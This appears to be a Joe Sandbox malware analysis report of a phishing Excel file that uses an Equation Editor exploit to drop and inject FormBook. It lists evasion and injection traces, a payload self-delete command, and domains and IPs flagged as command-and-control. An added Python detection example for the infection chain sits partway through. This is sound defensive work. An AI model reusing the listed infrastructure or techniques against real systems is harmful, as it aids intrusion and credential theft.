Source: C:\Windows\SysWOW64\wscript.exe | RDTSC instruction interceptor: first address 00000000000798E4, second address 00000000000798EA; instructions: [0x00] rdtsc; [0x02] xor ecx, ecx; [0x04] add ecx, eax; [0x06] rdtsc
Source: C:\Windows\SysWOW64\wscript.exe | RDTSC instruction interceptor: first address 0000000000079B5E, second address 0000000000079B64; instructions: [0x00] rdtsc; [0x02] xor ecx, ecx; [0x04] add ecx, eax; [0x06] rdtsc
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00409A90 rdtsc
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2688 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\explorer.exe TID: 1688 | Thread sleep time: -54000s >= -30000s
Source: C:\Windows\SysWOW64\wscript.exe TID: 2232 | Thread sleep time: -55000s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed (reported 2 times)
Source: explorer.exe, 00000008.00000000.2193737356.0000000004234000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000008.00000002.2389363675.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.2193784848.0000000004263000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000008.00000000.2193737356.0000000004234000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000008.00000002.2389389885.0000000000231000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Users\Public\vbc.exe | Process information queried: ProcessInformation
Source: C:\Users\Public\vbc.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\wscript.exe | Process queried: DebugPort
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00409A90 rdtsc
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0040ACD0 LdrLoadDll,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00E95465 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00E95EF8 __decode_pointer,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,__encode_pointer,InterlockedExchange,FreeLibrary,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00E91000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Code function: 4_2_000A1C53 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Code function: 4_2_000A11ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Code function: 4_2_000A1BB3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Code function: 4_2_000A1BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00E91000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Code function: 6_2_008626F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_023426F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\wscript.exe | Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00E95465 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00E9305A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00E93912 SetUnhandledExceptionFilter,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00E996FF __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00E9305A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00E93912 SetUnhandledExceptionFilter,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00E95465 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00E996FF __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 160.153.138.53 80
Source: C:\Windows\explorer.exe | Network Connect: 104.164.99.242 80
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80

Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1388
Source: C:\Windows\SysWOW64\wscript.exe | Thread register set: target process: 1388

Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe | Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe | Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: 4F0000
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: explorer.exe, 00000008.00000002.2389520858.00000000006F0000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2389489845.0000000000A80000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000002.2389520858.00000000006F0000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2389489845.0000000000A80000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000002.2389363675.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000008.00000002.2389520858.00000000006F0000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2389489845.0000000000A80000.00000002.00000001.sdmp | Binary or memory string: !Progman
Source: C:\Users\Public\vbc.exe | Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
Source: C:\Users\Public\vbc.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,
Source: C:\Users\Public\vbc.exe | Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
Source: C:\Users\Public\vbc.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\Public\vbc.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,
Source: C:\Users\Public\vbc.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\Public\vbc.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,
Source: C:\Users\Public\vbc.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,
Source: C:\Users\Public\vbc.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
Source: C:\Users\Public\vbc.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
Source: C:\Users\Public\vbc.exe | Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
Source: C:\Users\Public\vbc.exe | Code function: GetLocaleInfoA,
Source: C:\Users\Public\vbc.exe | Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,
Source: C:\Users\Public\vbc.exe | Code function: _strlen,EnumSystemLocalesA,
Source: C:\Users\Public\vbc.exe | Code function: GetLocaleInfoA,
Source: C:\Users\Public\vbc.exe | Code function: GetLocaleInfoW,
Source: C:\Users\Public\vbc.exe | Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,
Source: C:\Users\Public\vbc.exe | Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,
Source: C:\Users\Public\vbc.exe | Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,
Source: C:\Users\Public\vbc.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00E9515C GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00EA0DE3 __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,
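The chain reported above (EQNEDT32.EXE writes C:\Users\Public\vbc.exe and connects out, vbc.exe starts from C:\Users\Public, a second vbc.exe instance injects explorer.exe, and wscript.exe finally runs cmd.exe /c del on the dropped file) is what the cited Sigma rules key on. The following is an added example, not code from the Joe Sandbox report and not a vendor rule set: a small rule engine run over constructed Sysmon-style events that reproduce that chain. Field names follow Sysmon conventions (EventID 1 process create, 3 network connect, 11 file create); the rule names, the suspicious-folder list, the Event dataclass and every sample event are assumptions, not captured telemetry.

```python
r"""Rule-style detection for the Equation Editor exploit chain described in this report.

Added example; not part of the Joe Sandbox report and not a vendor rule set.
The events below are constructed to mirror the reported chain
(EQNEDT32.EXE -> C:\Users\Public\vbc.exe -> vbc.exe -> injected explorer.exe
-> wscript.exe -> cmd.exe /c del), not real logs. Rule names, the
suspicious-folder list and the Event dataclass are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    event_id: int              # Sysmon: 1 = process create, 3 = network connect, 11 = file create
    image: str                 # process performing the action
    parent_image: str = ""     # EventID 1 only
    command_line: str = ""     # EventID 1 only
    target_filename: str = ""  # EventID 11 only
    dest_ip: str = ""          # EventID 3 only
    dest_port: int = 0         # EventID 3 only


# Assumption: extend with whatever other user-writable launch locations your estate cares about.
SUSPICIOUS_EXEC_DIRS = ("c:\\users\\public\\",)

# "del [/switches] <path>" with optional single or double quotes around the path.
_DEL_RE = re.compile(r"""\bdel\b\s+(?:/[a-z]+\s+)*["']?([^"']+?)["']?\s*$""", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_equation_editor(path: str) -> bool:
    return _basename(path) == "eqnedt32.exe"


def deleted_path(command_line: str):
    """Path targeted by a 'del' in a cmd.exe command line (lower-cased), or None."""
    m = _DEL_RE.search(command_line)
    return m.group(1).strip().lower() if m else None


def evaluate(events):
    """Return (rule_name, event_index) pairs in event order.

    The last rule is stateful: a cmd.exe 'del' fires only when its target is a
    file that EQNEDT32.EXE wrote earlier in the same stream, i.e. a dropped
    payload cleaning up after itself.
    """
    alerts = []
    dropped = set()
    for i, ev in enumerate(events):
        if ev.event_id == 11 and is_equation_editor(ev.image):
            dropped.add(ev.target_filename.lower())
            alerts.append(("file_dropped_by_eqnedt32", i))
        elif ev.event_id == 3 and is_equation_editor(ev.image):
            alerts.append(("eqnedt32_network_connect", i))
        elif ev.event_id == 1:
            if is_equation_editor(ev.parent_image):
                alerts.append(("eqnedt32_child_process", i))
            if ev.image.lower().startswith(SUSPICIOUS_EXEC_DIRS):
                alerts.append(("exec_from_suspicious_folder", i))
            if _basename(ev.image) == "cmd.exe" and deleted_path(ev.command_line) in dropped:
                alerts.append(("dropped_payload_self_delete", i))
    return alerts


EQNEDT32 = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
VBC = r"C:\Users\Public\vbc.exe"
EXPLORER = r"C:\Windows\explorer.exe"
WSCRIPT = r"C:\Windows\SysWOW64\wscript.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"

# Constructed events mirroring the reported chain; not real telemetry.
SAMPLE_EVENTS = [
    Event(11, EQNEDT32, target_filename=VBC),
    Event(3, EQNEDT32, dest_ip="103.141.138.87", dest_port=80),
    Event(1, VBC, parent_image=EQNEDT32, command_line=f"'{VBC}'"),
    Event(1, VBC, parent_image=VBC, command_line=VBC),
    Event(1, WSCRIPT, parent_image=EXPLORER, command_line=WSCRIPT),  # parent is the injected explorer.exe
    Event(1, CMD, parent_image=WSCRIPT, command_line=f"{CMD} /c del '{VBC}'"),
    Event(1, r"C:\Windows\System32\notepad.exe", parent_image=EXPLORER, command_line="notepad.exe"),
]

if __name__ == "__main__":
    for rule, idx in evaluate(SAMPLE_EVENTS):
        print(f"{rule:30} event {idx}: {SAMPLE_EVENTS[idx].image}")
```

Note what the process-creation view cannot see: wscript.exe is launched by explorer.exe, which looks benign because explorer.exe was injected into rather than replaced. That link has to come from injection or memory telemetry (the thread-context, APC and section-mapping observations above), not from parent/child rules.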

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Numbers in parentheses are the signature-hit counts as extracted from the report.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API (1) | Path Interception | Process Injection (512) | Rootkit (1) | Credential API Hooking (1) | System Time Discovery (2) | Remote Services | Credential API Hooking (1) | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Shared Modules (1) | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading (111) | LSASS Memory | Security Software Discovery (231) | Remote Desktop Protocol | Archive Collected Data (1) | Exfiltration Over Bluetooth | Ingress Tool Transfer (14) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution (13) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (1) | Security Account Manager | Virtualization/Sandbox Evasion (2) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion (2) | NTDS | Process Discovery (2) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (23) | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection (512) | LSA Secrets | Remote System Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information (1) | Cached Domain Credentials | File and Directory Discovery (1) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information (31) | DCSync | System Information Discovery (113) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing (1) | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

          Behavior Graph

Behavior Graph ID: 323042 | Sample: PI202009255687.xlsx | Start date: 26/11/2020 | Architecture: WINDOWS | Score: 100

Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 14 other signatures

Process tree as rendered in the graph:

EXCEL.EXE (started)
    dropped: C:\Users\user\Desktop\~$PI202009255687.xlsx (data)
EQNEDT32.EXE (started)
    network: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu 103.141.138.87, 49167, 80 (VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN, Viet Nam)
    dropped: C:\Users\user\AppData\Local\...\winlog[1].exe (PE32); C:\Users\Public\vbc.exe (PE32)
    signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    -> vbc.exe (started)
        signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        -> vbc.exe (started)
            signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
            -> explorer.exe (injected)
                network: lygosfilms.info 34.102.136.180, 49168, 80 (GOOGLEUS, United States); paletciniz.com 160.153.138.53, 49169, 80 (GODADDY-AMSDE, United States); 3 other IPs or domains
                signature: System process connects to network (likely due to code injection or exploit)
                -> wscript.exe (started)
                    signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    -> cmd.exe (started)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
PI202009255687.xlsx | 25% | ReversingLabs | Document-Word.Trojan.Phishing

Dropped Files

Source | Detection | Scanner | Label
C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe | 31% | ReversingLabs | Win32.Trojan.Jaik
C:\Users\Public\vbc.exe | 31% | ReversingLabs | Win32.Trojan.Jaik

Unpacked PE Files

Source | Detection | Scanner | Label
6.2.vbc.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

Source | Detection | Scanner
wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu | 6% | Virustotal
www.annaothomas.com | 0% | Virustotal

          URLs


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu | 103.141.138.87 | true | true | - | unknown
          paletciniz.com | 160.153.138.53 | true | true | - | unknown
          lygosfilms.info | 34.102.136.180 | true | true | - | unknown
          www.annaothomas.com | 104.164.99.242 | true | true | - | unknown
          www.paletciniz.com | unknown | unknown | true | - | unknown
          www.lygosfilms.info | unknown | unknown | true | - | unknown

                  URLs from Memory and Binaries

                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.google.si/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://wordpress.orgwscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.google.cz/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.soso.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.univision.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.paletciniz.com/wp-json/wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://search.ebay.it/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.asharqalawsat.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://busca.orange.es/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000008.00000000.2206193001.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://search.yahoo.co.jpexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.paletciniz.com/feed/wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.target.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://buscador.terra.es/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://search.orange.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.iask.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown

Contacted IPs

Public

IP              Domain   Country        ASN     ASN Name                                                    Malicious
160.153.138.53  unknown  United States  21501   GODADDY-AMS (DE)                                            true
104.164.99.242  unknown  United States  18779   EGIHOSTING (US)                                             true
103.141.138.87  unknown  Viet Nam       135905  VNPT-AS-VN VIETNAM POSTS AND TELECOMMUNICATIONS GROUP (VN)  true
34.102.136.180  unknown  United States  15169   GOOGLE (US)                                                 true

                                                                                                                                      General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 323042
Start date: 26.11.2020
Start time: 08:58:52
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 40s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: PI202009255687.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSX@9/6@4/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 38.2% (good quality ratio 36.3%)
• Quality average: 77.7%
• Quality standard deviation: 28.5%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100

                                                                                                                                      Simulations

                                                                                                                                      Behavior and APIs

Time      Type             Description
